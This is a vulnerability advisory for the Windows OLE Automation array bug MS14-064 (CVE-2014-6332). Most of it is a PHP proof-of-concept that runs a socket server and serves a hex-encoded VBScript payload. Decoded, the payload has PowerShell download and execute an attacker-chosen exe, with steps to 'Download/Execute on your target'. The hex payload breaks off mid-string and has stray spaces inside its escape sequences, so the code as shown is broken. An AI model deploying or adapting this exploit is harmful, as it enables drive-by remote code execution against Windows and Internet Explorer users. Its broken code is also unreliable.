Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)
VIDEO
Document Title:
===============
Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1576
Video: http://youtu.be/Vkswz7vt23M
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332
CVE-ID:
=======
CVE-2014-6332
Release Date:
=============
2015-08-15
Vulnerability Laboratory ID (VL-ID):
============================== ======
1576
Common Vulnerability Scoring System:
==============================
======
9.3
Abstract Advisory Information:
==============================
The Vulnerability Laboratory discovered remote code execution vulnerability in the Microsoft HTA (HTML Application) - MS14-064.
Vulnerability Disclosure Timeline:
============================== ====
2015-08-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
============================== ==
OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1,
Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by
an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation
Array Remote Code Execution Vulnerability.
Proof of Concept (PoC):
=======================
The vulnerbility can be exploited by remote attackers without user interaction or privilege application user accounts.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce ...
1 . Run php code : php hta.php
2 . Copy this php output (HTML) and Paste as poc.hta (Replace ip)
3 . Open poc.hta
4 . Your Link Download/Execute on your target
5 . Finished ;)
#!/usr/bin/php
<?php
# Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot] com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# MS14-064
#
#
# 1 . run php code : php hta.php
# 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip)
# 3 . open poc.hta
# 4 . Your Link Download/Execute on your target
# 5 . Finished ;)
#
# Demo : http://youtu.be/Vkswz7vt23M
#
$port=80; # Port Address
$link=" http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe "; # Your exe link
print " Mohammad Reza Espargham\n\n\n";
$host= gethostname(); #g3th0stn4m3
$ip = gethostbyname($host); #g3th0stbyn4m3
print "Winrar HTML Code\n".'<html><head><title> poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n";
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, 0,$port);
socket_listen($reza);
$msgd =
"\x3c\x68\x74\x6d\x6c\x3e\x0d\ x0a\x3c\x6d\x65\x74\x61\x20\ x68\x74\x74\x70\x2d\x65\x71\ x75\x69\x76".
"\x3d\x22\x58\x2d\x55\x41\x2d\ x43\x6f\x6d\x70\x61\x74\x69\ x62\x6c\x65\x22\x20\x63\x6f\ x6e\x74\x65".
"\x6e\x74\x3d\x22\x49\x45\x3d\ x45\x6d\x75\x6c\x61\x74\x65\ x49\x45\x38\x22\x20\x3e\x0d\ x0a\x3c\x68".
"\x65\x61\x64\x3e\x0d\x0a\x3c\ x2f\x68\x65\x61\x64\x3e\x0d\ x0a\x3c\x62\x6f\x64\x79\x3e\ x0d\x0a\x20".
"\x0d\x0a\x3c\x53\x43\x52\x49\ x50\x54\x20\x4c\x41\x4e\x47\ x55\x41\x47\x45\x3d\x22\x56\ x42\x53\x63".
"\x72\x69\x70\x74\x22\x3e\x0d\ x0a\x0d\x0a\x66\x75\x6e\x63\ x74\x69\x6f\x6e\x20\x72\x75\ x6e\x6d\x75".
"\x6d\x61\x61\x28\x29\x20\x0d\ x0a\x4f\x6e\x20\x45\x72\x72\ x6f\x72\x20\x52\x65\x73\x75\ x6d\x65\x20".
"\x4e\x65\x78\x74\x0d\x0a\x73\ x65\x74\x20\x73\x68\x65\x6c\ x6c\x3d\x63\x72\x65\x61\x74\ x65\x6f\x62".
"\x6a\x65\x63\x74\x28\x22\x53\ x68\x65\x6c\x6c\x2e\x41\x70\ x70\x6c\x69\x63\x61\x74\x69\ x6f\x6e\x22".
"\x29\x0d\x0a\x63\x6f\x6d\x6d\ x61\x6e\x64\x3d\x22\x49\x6e\ x76\x6f\x6b\x65\x2d\x45\x78\ x70\x72\x65".
"\x73\x73\x69\x6f\x6e\x20\x24\ x28\x4e\x65\x77\x2d\x4f\x62\ x6a\x65\x63\x74\x20\x53\x79\ x73\x74\x65".
"\x6d\x2e\x4e\x65\x74\x2e\x57\ x65\x62\x43\x6c\x69\x65\x6e\ x74\x29\x2e\x44\x6f\x77\x6e\ x6c\x6f\x61".
"\x64\x46\x69\x6c\x65\x28\x27\ x46\x49\x4c\x45\x5f\x44\x4f\ x57\x4e\x4c\x4f\x41\x44\x27\ x2c\x27\x6c".
"\x6f\x61\x64\x2e\x65\x78\x65\ x27\x29\x3b\x24\x28\x4e\x65\ x77\x2d\x4f\x62\x6a\x65\x63\ x74\x20\x2d".
"\x63\x6f\x6d\x20\x53\x68\x65\ x6c\x6c\x2e\x41\x70\x70\x6c\ x69\x63\x61\x74\x69\x6f\x6e\ x29\x2e\x53".
"\x68\x65\x6c\x6c\x45\x78\x65\ x63\x75\x74\x65\x28\x27\x6c\ x6f\x61\x64\x2e\x65\x78\x65\ x27\x29\x3b".
"\x22\x0d\x0a\x73\x68\x65\x6c\ x6c\x2e\x53\x68\x65\x6c\x6c\ x45\x78\x65\x63\x75\x74\x65\ x20\x22\x70".
"\x6f\x77\x65\x72\x73\x68\x65\ x6c\x6c\x2e\x65\x78\x65\x22\ x2c\x20\x22\x2d\x43\x6f\x6d\ x6d\x61\x6e".
"\x64\x20\x22\x20\x26\x20\x63\ x6f\x6d\x6d\x61\x6e\x64\x2c\ x20\x22\x22\x2c\x20\x22\x72\ x75\x6e\x61".
"\x73\x22\x2c\x20\x30\x0d\x0a\ x65\x6e\x64\x20\x66\x75\x6e\ x63\x74\x69\x6f\x6e\x0d\x0a\ x3c\x2f\x73".
"\x63\x72\x69\x70\x74\x3e\x0d\ x0a\x20\x0d\x0a\x3c\x53\x43\ x52\x49\x50\x54\x20\x4c\x41\ x4e\x47\x55".
"\x41\x47\x45\x3d\x22\x56\x42\ x53\x63\x72\x69\x70\x74\x22\ x3e\x0d\x0a\x20\x20\x0d\x0a\ x64\x69\x6d".
"\x20\x20\x20\x61\x61\x28\x29\ x0d\x0a\x64\x69\x6d\x20\x20\ x20\x61\x62\x28\x29\x0d\x0a\ x64\x69\x6d".
"\x20\x20\x20\x61\x30\x0d\x0a\ x64\x69\x6d\x20\x20\x20\x61\ x31\x0d\x0a\x64\x69\x6d\x20\ x20\x20\x61".
"\x32\x0d\x0a\x64\x69\x6d\x20\ x20\x20\x61\x33\x0d\x0a\x64\ x69\x6d\x20\x20\x20\x77\x69\ x6e\x39\x78".
"\x0d\x0a\x64\x69\x6d\x20\x20\ x20\x69\x6e\x74\x56\x65\x72\ x73\x69\x6f\x6e\x0d\x0a\x64\ x69\x6d\x20".
"\x20\x20\x72\x6e\x64\x61\x0d\ x0a\x64\x69\x6d\x20\x20\x20\ x66\x75\x6e\x63\x6c\x61\x73\ x73\x0d\x0a".
"\x64\x69\x6d\x20\x20\x20\x6d\ x79\x61\x72\x72\x61\x79\x0d\ x0a\x20\x0d\x0a\x42\x65\x67\ x69\x6e\x28".
"\x29\x0d\x0a\x20\x0d\x0a\x66\ x75\x6e\x63\x74\x69\x6f\x6e\ x20\x42\x65\x67\x69\x6e\x28\ x29\x0d\x0a".
"\x20\x20\x4f\x6e\x20\x45\x72\ x72\x6f\x72\x20\x52\x65\x73\ x75\x6d\x65\x20\x4e\x65\x78\ x74\x0d\x0a".
"\x20\x20\x69\x6e\x66\x6f\x3d\ x4e\x61\x76\x69\x67\x61\x74\ x6f\x72\x2e\x55\x73\x65\x72\ x41\x67\x65".
"\x6e\x74\x0d\x0a\x20\x0d\x0a\ x20\x20\x69\x66\x28\x69\x6e\ x73\x74\x72\x28\x69\x6e\x66\ x6f\x2c\x22".
"\x57\x69\x6e\x36\x34\x22\x29\ x3e\x30\x29\x20\x20\x20\x74\ x68\x65\x6e\x0d\x0a\x20\x20\ x20\x20\x20".
"\x65\x78\x69\x74\x20\x20\x20\ x66\x75\x6e\x63\x74\x69\x6f\ x6e\x0d\x0a\x20\x20\x65\x6e\ x64\x20\x69".
"\x66\x0d\x0a\x20\x0d\x0a\x20\ x20\x69\x66\x20\x28\x69\x6e\ x73\x74\x72\x28\x69\x6e\x66\ x6f\x2c\x22".
"\x4d\x53\x49\x45\x22\x29\x3e\ x30\x29\x20\x20\x20\x74\x68\ x65\x6e\x20\x0d\x0a\x20\x20\ x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\ x20\x69\x6e\x74\x56\x65\x72\ x73\x69\x6f\x6e\x20\x3d\x20\ x43\x49\x6e".
"\x74\x28\x4d\x69\x64\x28\x69\ x6e\x66\x6f\x2c\x20\x49\x6e\ x53\x74\x72\x28\x69\x6e\x66\ x6f\x2c\x20".
"\x22\x4d\x53\x49\x45\x22\x29\ x20\x2b\x20\x35\x2c\x20\x32\ x29\x29\x20\x20\x20\x0d\x0a\ x20\x20\x65".
"\x6c\x73\x65\x0d\x0a\x20\x20\ x20\x20\x20\x65\x78\x69\x74\ x20\x20\x20\x66\x75\x6e\x63\ x74\x69\x6f".
"\x6e\x20\x20\x0d\x0a\x20\x20\ x20\x20\x20\x20\x20\x20\x20\ x20\x20\x20\x20\x20\x0d\x0a\ x20\x20\x65".
"\x6e\x64\x20\x69\x66\x0d\x0a\ x20\x0d\x0a\x20\x20\x77\x69\ x6e\x39\x78\x3d\x30\x0d\x0a\ x20\x0d\x0a".
"\x20\x20\x42\x65\x67\x69\x6e\ x49\x6e\x69\x74\x28\x29\x0d\ x0a\x20\x20\x49\x66\x20\x43\ x72\x65\x61".
"\x74\x65\x28\x29\x3d\x54\x72\ x75\x65\x20\x54\x68\x65\x6e\ x0d\x0a\x20\x20\x20\x20\x20\ x6d\x79\x61".
"\x72\x72\x61\x79\x3d\x20\x20\ x20\x20\x20\x20\x20\x20\x63\ x68\x72\x77\x28\x30\x31\x29\ x26\x63\x68".
"\x72\x77\x28\x32\x31\x37\x36\ x29\x26\x63\x68\x72\x77\x28\ x30\x31\x29\x26\x63\x68\x72\ x77\x28\x30".
"\x30\x29\x26\x63\x68\x72\x77\ x28\x30\x30\x29\x26\x63\x68\ x72\x77\x28\x30\x30\x29\x26\ x63\x68\x72".
"\x77\x28\x30\x30\x29\x26\x63\ x68\x72\x77\x28\x30\x30\x29\ x0d\x0a\x20\x20\x20\x20\x20\ x6d\x79\x61".
"\x72\x72\x61\x79\x3d\x6d\x79\ x61\x72\x72\x61\x79\x26\x63\ x68\x72\x77\x28\x30\x30\x29\ x26\x63\x68".
"\x72\x77\x28\x33\x32\x37\x36\ x37\x29\x26\x63\x68\x72\x77\ x28\x30\x30\x29\x26\x63\x68\ x72\x77\x28".
"\x30\x29\x0d\x0a\x20\x0d\x0a\ x20\x20\x20\x20\x20\x69\x66\ x28\x69\x6e\x74\x56\x65\x72\ x73\x69\x6f".
"\x6e\x3c\x34\x29\x20\x74\x68\ x65\x6e\x0d\x0a\x20\x20\x20\ x20\x20\x20\x20\x20\x20\x64\ x6f\x63\x75".
"\x6d\x65\x6e\x74\x2e\x77\x72\ x69\x74\x65\x28\x22\x3c\x62\ x72\x3e\x20\x49\x45\x22\x29\ x0d\x0a\x20".
"\x20\x20\x20\x20\x20\x20\x20\ x20\x64\x6f\x63\x75\x6d\x65\ x6e\x74\x2e\x77\x72\x69\x74\ x65\x28\x69".
"\x6e\x74\x56\x65\x72\x73\x69\ x6f\x6e\x29\x0d\x0a\x20\x20\ x20\x20\x20\x20\x20\x20\x20\ x72\x75\x6e".
"\x73\x68\x65\x6c\x6c\x63\x6f\ x64\x65\x28\x29\x20\x20\x20\ x20\x20\x20\x20\x20\x20\x20\ x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\ x0d\x0a\x20\x20\x20\x20\x20\ x65\x6c\x73\x65\x20\x20\x0d\ x0a\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\ x20\x73\x65\x74\x6e\x6f\x74\ x73\x61\x66\x65\x6d\x6f\x64\ x65\x28\x29".
"\x0d\x0a\x20\x20\x20\x20\x20\ x65\x6e\x64\x20\x69\x66\x0d\ x0a\x20\x20\x65\x6e\x64\x20\ x69\x66\x0d".
"\x0a\x65\x6e\x64\x20\x66\x75\ x6e\x63\x74\x69\x6f\x6e\x0d\ x0a\x20\x0d\x0a\x66\x75\x6e\ x63\x74\x69".
"\x6f\x6e\x20\x42\x65\x67\x69\ x6e\x49\x6e\x69\x74\x28\x29\ x0d\x0a\x20\x20\x20\x52\x61\ x6e\x64\x6f".
"\x6d\x69\x7a\x65\x28\x29\x0d\ x0a\x20\x20\x20\x72\x65\x64\ x69\x6d\x20\x61\x61\x28\x35\ x29\x0d\x0a".
"\x20\x20\x20\x72\x65\x64\x69\ x6d\x20\x61\x62\x28\x35\x29\ x0d\x0a\x20\x20\x20\x61\x30\ x3d\x31\x33".
"\x2b\x31\x37\x2a\x72\x6e\x64\ x28\x36\x29\x0d\x0a\x20\x20\ x20\x61\x33\x3d\x37\x2b\x33\ x2a\x72\x6e".
"\x64\x28\x35\x29\x0d\x0a\x65\ x6e\x64\x20\x66\x75\x6e\x63\ x74\x69\x6f\x6e\x0d\x0a\x20\ x0d\x0a\x66".
"\x75\x6e\x63\x74\x69\x6f\x6e\ x20\x43\x72\x65\x61\x74\x65\ x28\x29\x0d\x0a\x20\x20\x4f\ x6e\x20\x45".
"\x72\x72\x6f\x72\x20\x52\x65\ x73\x75\x6d\x65\x20\x4e\x65\ x78\x74\x0d\x0a\x20\x20\x64\ x69\x6d\x20".
"\x69\x0d\x0a\x20\x20\x43\x72\ x65\x61\x74\x65\x3d\x46\x61\ x6c\x73\x65\x0d\x0a\x20\x20\ x46\x6f\x72".
"\x20\x69\x20\x3d\x20\x30\x20\ x54\x6f\x20\x34\x30\x30\x0d\ x0a\x20\x20\x20\x20\x49\x66\ x20\x4f\x76".
"\x65\x72\x28\x29\x3d\x54\x72\ x75\x65\x20\x54\x68\x65\x6e\ x0d\x0a\x20\x20\x20\x20\x20\ x20\x20\x43".
"\x72\x65\x61\x74\x65\x3d\x54\ x72\x75\x65\x0d\x0a\x20\x20\ x20\x20\x20\x20\x20\x45\x78\ x69\x74\x20".
"\x46\x6f\x72\x0d\x0a\x20\x20\ x20\x20\x45\x6e\x64\x20\x49\ x66\x20\x0d\x0a\x20\x20\x4e\ x65\x78\x74".
"\x0d\x0a\x65\x6e\x64\x20\x66\ x75\x6e\x63\x74\x69\x6f\x6e\ x0d\x0a\x20\x0d\x0a\x73\x75\ x62\x20\x74".
"\x65\x73\x74\x61\x61\x28\x29\ x0d\x0a\x65\x6e\x64\x20\x73\ x75\x62\x0d\x0a\x20\x0d\x0a\ x66\x75\x6e".
"\x63\x74\x69\x6f\x6e\x20\x6d\ x79\x64\x61\x74\x61\x28\x29\ x0d\x0a\x20\x20\x20\x20\x4f\ x6e\x20\x45".
"\x72\x72\x6f\x72\x20\x52\x65\ x73\x75\x6d\x65\x20\x4e\x65\ x78\x74\x0d\x0a\x20\x20\x20\ x20\x20\x69".
"\x3d\x74\x65\x73\x74\x61\x61\ x0d\x0a\x20\x20\x20\x20\x20\